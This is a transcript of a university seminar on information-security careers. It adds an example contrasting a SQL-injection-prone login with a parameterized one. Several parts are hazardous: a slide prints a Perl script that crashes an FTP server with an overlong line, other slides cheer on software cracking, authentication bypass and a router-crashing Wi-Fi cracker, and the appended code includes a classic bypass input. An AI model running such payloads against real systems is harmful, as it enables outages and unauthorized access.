Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Presentation on topics beyond the conventional ethical hacking, discusses job factors and scope in the security field :) this was presented in LPU (Lovely Professional University) as a Seminar with attendees over 200. Meet me at FB if u want it fb/nipun.jaswal

Presentation Transcript

  • Life Beyond Ethical Hacking: “The Actual Information Security”. By: Nipun Jaswal (CSA, HCF Infosec Pvt. Ltd.)
  • Acknowledgements: Dr. H.S Johal, Ms. Himanshi
  • Lil About My Self
      • Certified With C|EH, CISE, AFCEH
      • Associated With over 9 Companies
      • Ambassador, EC-COUNCIL
      • Creator Of India’s First DLP on Web Application Penetration Testing Course
      • Student @ LPU
      • Tested Over 90+ Servers
      • Currently working as Chief Security Analyst at HCF Infosec Pvt. Ltd
  • Let's Go Old School: What is Ethical Hacking?
      • Breaking Into Devices, Networks Legally.
      • Securing Servers, Recovering Emails etc.
      • But the Question Remains! Where to get these jobs?
  • Jobs And Stats
  • Why More Jobs and Less People?
      • Emerging Technology
      • Still Register Work
      • Don’t want to spend money
      • Find it too difficult
      • People feel they can learn hacking in a 2-day workshop :-P
      • No proper facilities for required courses
  • Salary Packages
      • Normal B.Tech: 300K-400K
      • BPO: 100K-250K
      • DEVELOPMENT: 300K-700K
      • SECURITY: 600K-1300K
  • Beyond So Called “Ethical Hacking”
      • Web Application Penetration Testing
      • Exploit Writing
      • Reverse Engineering
      • Malware Analysis
      • Computer Forensics
      • Protocol Analysis
  • Why To Go Beyond Ethical Hacking? Jobs For Ethical Hacker: Trainer, Trainer, Trainer, Trainer And Trainer. Salary Around: 15K + Incentives
  • Jobs Beyond Ethical Hacking: Jobs For Hackers: Researchers, Technical Heads, Penetration Testers, Forensic Investigators. Salary Around: 300-400K Per Month
  • Benefits of not Being a Hacker
  • Benefits of Being a Hacker: I M UR WORST NIGHTMARE :-P
  • How To Let Your Dreams Come True? Some Highly Paid Fields:
      • WAPT: Involves testing of web applications, websites, servers, and source code auditing.
      • Exploit Writing: Finding vulnerabilities in software and possibly exploiting the software.
      • Reverse Engineering: Software cracking, patches, modifying features of an end product.
  • How To Let Your Dreams Come True? Some Highly Paid Fields:
      • Wireless Testing: Involves network security infrastructure build-up, managing networks, system administration etc.
      • Projects: Good at coding? Show it to the whole world.
      • Forensics: Highest paid job in the entire list. Takes a lot, and pays a lot.
  • Why We Need More People ? Source: Indian Express
  • Why We Need More People ? Source: Times Of India
  • Host Gator Hacked !! 3 Lac Websites Owned By Hackers Source: SoftPedia
  • Host Gator Hacked !! 3 Lac Websites Owned By Hackers Contd.. Source: Private
  • Norton India Hacked !! Source: Private
  • Norton India’s Database Hacked !! Source: Private
  • The Biggest Of All… Anonymous!! Source: National Post
  • Now Beyond The Word ‘Ethical’: Web Application Penetration Testing
      • Find bugs in web applications: custom-made and open-source applications.
      • Bugs which may compromise the security, make it vulnerable, or help an attacker steal sensitive information.
      • Now, how to perform 1 out of 300 tests in a web application pen-test?
      • Let's see a simple example: SQL Injection Bypass
  • Rise Of The Web Applications
  • Fasten Your Seat Belts , Its Showtime DEMO
  • Now Beyond The Word ‘Ethical’: Exploit Writing
      • Potentially writing code to exploit a vulnerability.
      • Highly paid; software is vulnerable to exploits, which may in turn lead to compromise of the entire system.
      • Requirement: C, C++, Perl, Python, Ruby, Assembly language
  • Now Beyond The Word ‘Ethical’: Simplest of The Exploit in Python - Crashing A Secure Port FTP Server

        # Note: the slide title says Python, but this script is Perl.
        use strict;
        use Socket;

        # 1000 bytes of 'A' (0x41), sent as one overlong line
        my $junk  = "\x41" x 1000;
        my $host  = shift || '192.168.15.1';
        my $port  = shift || 200;
        my $proto = getprotobyname('tcp');
        my $iaddr = inet_aton($host);
        my $paddr = sockaddr_in($port, $iaddr);

        print "[+] Setting up socket\n";
        socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
        print "[+] Connecting to $host on port $port\n";
        connect(SOCKET, $paddr) or die "connect: $!";
        print "[+] Sending payload\n";
        print SOCKET $junk . "\n";
        print "[+] Payload sent\n";
        close SOCKET or die "close: $!";

  • Now Beyond The Word ‘Ethical’ Prices for Various Exploits
  • Now Beyond The Word ‘Ethical’: Reverse Engineering
      • Editing the final software to find serial keys, stop the online authentications
      • Mostly used by pirates
      • Sometimes used to edit the features of a final software
      • Make your life easier with free products
  • Now Beyond The Word ‘Ethical’: Wireless Penetration Testing
      • Involves auditing of network security over wireless
      • Installation of servers and security devices
      • Crack-proofing wireless passwords
      • Highly paid
      • Requires networking background
  • INSANITY WIFI CRACKER: Insanity Wi-fi Cracker
      • Developed by me and my friends for minor project
      • Automates the cracking of various wifi securities
      • Performs self MITM attack
      • DOS Service Can Crash the Routers For Ever :-P
      • Even an 8 years old can press the button ‘c’ for cracking and no. for a particular AP to crack
  • Wi-fi Cracking At a Click Of a Button DEMO
  • So A One Last Question , Wanna go this ?
  • Or Wanna Go This ?
  • After All It’s your Career |Handle it with care|
  • Any Questions ?
  • Contact
      • Email: info@nipunjaswal.com
      • www.nipunjaswal.com
      • www.facebook.com/nipun.jaswal
      • www.hatcon.in
      • www.hcf.co.in
      • www.starthack.com
      • www.cyber-rog.com/h3ll
      • www.pentest.co.in
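
The SQL injection bypass named on the web application penetration testing slide was shown as a live demo and is not in the transcript. As an added example (not from the original presentation), the code below puts a login check built by string concatenation beside the parameterized form; the table, credentials and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """In-memory user table with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, password TEXT)")
    # Plaintext only to keep the example short; store a salted hash in practice.
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", "s3cret-constructed"))
    return db

def login_vulnerable(db, name, password):
    """Concatenates input into the statement, so quotes in it become SQL syntax."""
    query = ("SELECT name FROM users WHERE name = '" + name +
             "' AND password = '" + password + "'")
    return db.execute(query).fetchone() is not None

def login_hardened(db, name, password):
    """Binds input as parameters, so it is only ever compared as data."""
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    return db.execute(query, (name, password)).fetchone() is not None

def compare(name, password):
    """Run both checks on one input; returns (vulnerable, hardened) outcomes."""
    db = make_db()
    try:
        weak = login_vulnerable(db, name, password)
    except sqlite3.OperationalError:
        weak = "sql error"  # the input broke the statement's syntax
    return weak, login_hardened(db, name, password)

# Constructed inputs: the real password, a wrong one, the classic
# always-true clause, and a harmless name that merely contains a quote.
CASES = [
    ("admin", "s3cret-constructed"),
    ("admin", "wrong"),
    ("admin", "' OR '1'='1"),
    ("O'Brien", "x"),
]

if __name__ == "__main__":
    for name, password in CASES:
        print(repr(name), repr(password), "->", compare(name, password))
```

The third case is the bypass: the concatenated WHERE clause becomes always true, while the bound parameter is compared as an ordinary wrong password. The fourth shows that the same flaw also breaks legitimate input containing a quote.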